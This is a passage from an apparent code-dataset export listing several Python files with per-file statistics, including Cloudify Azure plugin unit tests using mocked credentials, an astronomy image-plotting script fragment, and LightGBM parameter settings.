maxden=1.5e6, dynrange=1e3, projaxis=1)
ax2.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=2)
ax3.imshow(image )
fig.subplots_adjust( left=0.0, bottom=0.0, top=1.0, right=1.0, wspace=0,hspace=0)
for ax in [ax1,ax2,ax3]:
ax.axis('off')
filename='{:s}_stellar_central_image_snap_{:.0f}_group_{:.0f}_res_{:.0f}.png'.format( run_base, snapnum, groupnr, npixels)
print filename
fig.savefig( './plots/'+filename, dpi=npixels )
| 46.785047
| 144
| 0.469636
| 524
| 5,006
| 4.322519
| 0.209924
| 0.031788
| 0.021192
| 0.031788
| 0.705077
| 0.705077
| 0.705077
| 0.705077
| 0.705077
| 0.702428
| 0
| 0.063624
| 0.40032
| 5,006
| 106
| 145
| 47.226415
| 0.690873
| 0.052936
| 0
| 0.553846
| 0
| 0
| 0.067344
| 0.035578
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.092308
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e2e73de49b2ae993187da70b1e5c2579dc7e2d2
| 42
|
py
|
Python
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 180
|
2019-04-30T05:50:32.000Z
|
2022-03-28T01:32:07.000Z
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 21
|
2019-05-03T17:42:54.000Z
|
2022-01-25T19:31:42.000Z
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 42
|
2019-05-01T15:15:19.000Z
|
2021-11-19T05:27:09.000Z
|
from park.envs.cache.cache import CacheEnv
| 42
| 42
| 0.857143
| 7
| 42
| 5.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7e3875fecd59cdaf314685549637debada0d1d9b
| 23
|
py
|
Python
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 4
|
2019-03-26T13:57:54.000Z
|
2021-11-04T04:55:49.000Z
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 1
|
2021-04-03T01:10:11.000Z
|
2021-04-03T01:10:11.000Z
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 2
|
2019-04-02T19:20:34.000Z
|
2019-08-13T16:39:52.000Z
|
from currency import *
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7e3e577e2a178c8aeeeeebb8010d37d8eb007d63
| 21,350
|
py
|
Python
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 2
|
2018-08-16T01:50:35.000Z
|
2018-11-17T20:31:37.000Z
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 43
|
2017-05-18T12:31:42.000Z
|
2019-01-08T09:20:42.000Z
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 4
|
2018-01-17T15:12:54.000Z
|
2019-07-16T10:39:24.000Z
|
# Copyright (c) 2015-2020 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
import requests
from cloudify import constants
from cloudify.state import current_ctx
from cloudify import mocks as cfy_mocks
from cloudify.exceptions import OperationRetry
from msrestazure.azure_exceptions import CloudError
from cloudify_azure import utils
from cloudify_azure.resources.compute import (availabilityset)
from cloudify_azure.resources.compute.virtualmachine import virtualmachine
def return_none(foo):
return
@mock.patch('azure_sdk.common.ClientSecretCredential')
@mock.patch('azure_sdk.resources.compute.'
'availability_set.ComputeManagementClient')
class AvailabilitySetTest(unittest.TestCase):
def _get_mock_context_for_run(self, operation=None):
operation = operation or {
'name': 'cloudify.interfaces.lifecycle.create'}
fake_ctx = cfy_mocks.MockCloudifyContext(operation=operation)
instance = mock.Mock()
instance.runtime_properties = {}
instance.relationships = []
fake_ctx._instance = instance
node = mock.Mock()
fake_ctx._node = node
node.properties = {
'use_external_resource': False,
'create_if_missing': False,
'use_if_exists': False,
}
node.runtime_properties = {}
node.type_hierarchy = ['ctx.nodes.Root']
fake_ctx.get_resource = mock.MagicMock(
return_value=""
)
return fake_ctx, node, instance
def setUp(self):
self.fake_ctx, self.node, self.instance = \
self._get_mock_context_for_run()
self.dummy_azure_credentials = {
'client_id': 'dummy',
'client_secret': 'dummy',
'subscription_id': 'dummy',
'tenant_id': 'dummy'
}
def test_create(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockavailset'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['resource_config'] = {
'platformUpdateDomainCount': 1,
'platformFaultDomainCount': 2
}
availability_set_conf = {
'location': self.node.properties.get('location'),
'platform_update_domain_count': 1,
'platform_fault_domain_count': 2
}
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().availability_sets.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.create(ctx=self.fake_ctx)
client().availability_sets.get.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name
)
client().availability_sets.create_or_update.assert_called_with(
resource_group_name=resource_group,
name=name,
parameters=availability_set_conf
)
def test_create_already_exists(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockavailset'
self.node.properties['use_external_resource'] = True
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['resource_config'] = {
'platformUpdateDomainCount': 1,
'platformFaultDomainCount': 2
}
client().availability_sets.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.create(ctx=self.fake_ctx)
client().availability_sets.get.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name
)
client().availability_sets.create_or_update.assert_not_called()
def test_delete(self, client, credentials):
resource_group = 'sample_resource_group'
name = 'mockavailset'
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
current_ctx.set(ctx=fake_ctx)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.delete(ctx=fake_ctx)
client().availability_sets.delete.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name)
def test_delete_do_not_exist(self, client, credentials):
resource_group = 'sample_resource_group'
name = 'mockavailset'
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().availability_sets.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.delete(ctx=fake_ctx)
client().availability_sets.delete.assert_not_called()
@mock.patch('azure_sdk.common.ClientSecretCredential')
@mock.patch('azure_sdk.resources.compute.'
'virtual_machine.ComputeManagementClient')
class VirtualMachineTest(unittest.TestCase):
def _get_mock_context_for_run(self, operation=None):
operation = operation or {
'name': 'cloudify.interfaces.lifecycle.create'}
fake_ctx = cfy_mocks.MockCloudifyContext(operation=operation)
instance = mock.Mock()
instance.runtime_properties = {}
instance.relationships = {}
fake_ctx._instance = instance
node = mock.Mock()
fake_ctx._node = node
node.properties = {}
node.type_hierarchy = []
node.runtime_properties = {}
node.type_hierarchy = ['ctx.nodes.Root', constants.COMPUTE_NODE_TYPE]
fake_ctx.get_resource = mock.MagicMock(
return_value=""
)
current_ctx.set(fake_ctx)
return fake_ctx, node, instance
def setUp(self):
self.fake_ctx, self.node, self.instance = \
self._get_mock_context_for_run()
self.dummy_azure_credentials = {
'client_id': 'dummy',
'client_secret': 'dummy',
'subscription_id': 'dummy',
'tenant_id': 'dummy'
}
@mock.patch('cloudify_azure.resources.compute.virtualmachine.'
'virtualmachine.build_network_profile',
side_effect=return_none)
def test_create(self, _, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2',
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
storage_profile = {
'os_disk': {
'caching': 'ReadWrite',
'vhd': {
'uri': 'http://None.blob./vhds/mockvm.vhd'
},
'name': 'mockvm',
'create_option': 'FromImage'
}
}
vm_params = {
'location': self.node.properties.get('location'),
'storageProfile': storage_profile,
}
vm_params = utils.handle_resource_config_params(
vm_params,
self.node.properties.get("resource_config")
)
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().virtual_machines.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
client()\
.virtual_machines.begin_create_or_update.assert_called_with(
resource_group_name=resource_group,
vm_name=name,
parameters=vm_params
)
self.assertEquals(
self.fake_ctx.instance.runtime_properties.get("name"),
name
)
self.assertEquals(
self.fake_ctx.instance.runtime_properties.get(
"resource_group"),
resource_group
)
def test_create_already_exists(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['use_external_resource'] = True
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2',
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
client().virtual_machines.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
# client().virtual_machines.create_or_update.assert_not_called()
def test_create_with_external_resource(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2'
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
self.node.properties['use_external_resource'] = True
client().virtual_machines.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
client()\
.virtual_machines.begin_create_or_update.assert_not_called()
def test_delete(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.delete(ctx=fake_ctx)
client().virtual_machines.begin_delete.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
def test_delete_do_not_exist(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.instance.runtime_properties['resource_group'] = resource_group
self.instance.runtime_properties['name'] = name
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().virtual_machines.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.delete(ctx=self.fake_ctx)
client().virtual_machines.begin_delete.assert_not_called()
def test_start(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.start'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/stopped'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with self.assertRaisesRegexp(
OperationRetry, 'Waiting for PowerState/running status'):
virtualmachine.start(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_start.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
def test_start_started(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.start'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/running'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
virtualmachine.start(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_start.assert_not_called()
def test_stopped(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.stop'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/deallocated'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.stop(ctx=fake_ctx)
client().virtual_machines.begin_power_off.assert_not_called()
def test_stop(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.stop'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/running'}]}}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
with self.assertRaisesRegexp(
OperationRetry,
'Waiting for {} PowerState/deallocated status'.format(name)
):
virtualmachine.stop(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_power_off.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
| 42.361111
| 79
| 0.598173
| 2,050
| 21,350
| 5.937561
| 0.123415
| 0.08117
| 0.051758
| 0.032862
| 0.86584
| 0.85023
| 0.841439
| 0.824351
| 0.808084
| 0.790338
| 0
| 0.007215
| 0.298876
| 21,350
| 503
| 80
| 42.445328
| 0.805932
| 0.030585
| 0
| 0.68559
| 0
| 0
| 0.198965
| 0.096316
| 0
| 0
| 0
| 0
| 0.045852
| 1
| 0.039301
| false
| 0.0131
| 0.024017
| 0.002183
| 0.074236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e42cacaf60e7f61af2c2dc816e961b9d6e19100
| 100
|
py
|
Python
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 21
|
2018-11-16T20:45:13.000Z
|
2022-03-06T17:06:40.000Z
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 1
|
2019-09-17T12:04:08.000Z
|
2019-09-17T12:04:08.000Z
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 9
|
2019-04-05T22:40:25.000Z
|
2021-09-01T20:53:43.000Z
|
# -*- coding: utf-8 -*-
def info_path(owner_id):
return 'data/photos_{}.csv'.format(owner_id)
| 16.666667
| 48
| 0.64
| 15
| 100
| 4
| 0.866667
| 0.233333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011765
| 0.15
| 100
| 5
| 49
| 20
| 0.694118
| 0.21
| 0
| 0
| 0
| 0
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
7e912358eac7f0e191c2ca4ce8035e8e868b6828
| 1,028
|
py
|
Python
|
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | 1
|
2018-05-22T10:20:54.000Z
|
2018-05-22T10:20:54.000Z
|
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | null | null | null |
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python3
param_list = [
{
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'train_metric': True,
'num_leaves': 63,
'lambda_l1': 0,
'lambda_l2': 1,
# 'min_data_in_leaf': 100,
'min_child_weight': 50,
'learning_rate': 0.1,
'feature_fraction': 0.6,
'bagging_fraction': 0.7,
'bagging_freq': 1,
'verbose': 1,
# 'early_stopping_round': 50,
'num_iterations': 300,
# 'is_unbalance': True,
'num_threads': 30
},
]
params = \
{
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'train_metric': True,
'num_leaves': 63,
'lambda_l1': 0,
'lambda_l2': 1,
# 'min_data_in_leaf': 100,
'min_child_weight': 50,
'learning_rate': 0.05,
'feature_fraction': 0.6,
'bagging_fraction': 0.7,
'bagging_freq': 1,
'verbose': 1,
'early_stopping_round': 1000,
'num_iterations': 5000,
# 'is_unbalance': True,
'num_threads': -1
}
| 20.56
| 33
| 0.566148
| 126
| 1,028
| 4.309524
| 0.420635
| 0.051565
| 0.062615
| 0.077348
| 0.865562
| 0.773481
| 0.773481
| 0.773481
| 0.773481
| 0.773481
| 0
| 0.071887
| 0.242218
| 1,028
| 49
| 34
| 20.979592
| 0.62516
| 0.136187
| 0
| 0.65
| 0
| 0
| 0.46538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7ea5787c79ed5675c156d7049394d578be6b6172
| 131
|
py
|
Python
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 46
|
2020-07-15T08:55:31.000Z
|
2022-03-29T08:34:30.000Z
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 2
|
2021-02-09T06:53:50.000Z
|
2021-09-12T09:28:22.000Z
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 13
|
2020-07-14T07:43:17.000Z
|
2022-01-17T14:44:47.000Z
|
from networks.factory import get_network_function
from networks.controller.network_controller import NetworkQuantizationController
| 43.666667
| 80
| 0.916031
| 14
| 131
| 8.357143
| 0.642857
| 0.205128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061069
| 131
| 2
| 81
| 65.5
| 0.95122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7eae5a96ae62a1530fceed6e11b4b55822f0182d
| 73
|
py
|
Python
|
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
from chargebee_v2.result import Result
class Content(Result):
pass
| 12.166667
| 38
| 0.767123
| 10
| 73
| 5.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.178082
| 73
| 5
| 39
| 14.6
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0e210d199d725642e7b849d5de8d3f922820d0bc
| 45
|
py
|
Python
|
mobie/__version__.py
|
mobie-org/mobie-utils-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 1
|
2020-03-03T01:33:06.000Z
|
2020-03-03T01:33:06.000Z
|
mobie/__version__.py
|
platybrowser/mmb-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 4
|
2020-05-15T09:27:59.000Z
|
2020-05-29T19:15:00.000Z
|
mobie/__version__.py
|
platybrowser/mmb-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 2
|
2020-06-08T07:06:01.000Z
|
2020-06-08T07:08:08.000Z
|
__version__ = "0.2.7"
SPEC_VERSION = "0.2.0"
| 15
| 22
| 0.644444
| 9
| 45
| 2.666667
| 0.555556
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0.133333
| 45
| 2
| 23
| 22.5
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0e23ae6485152f2482a8a345b02b469295049b35
| 34
|
py
|
Python
|
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | 1
|
2022-01-24T16:27:51.000Z
|
2022-01-24T16:27:51.000Z
|
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | null | null | null |
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | null | null | null |
from .TS import TopologySimilarity
| 34
| 34
| 0.882353
| 4
| 34
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
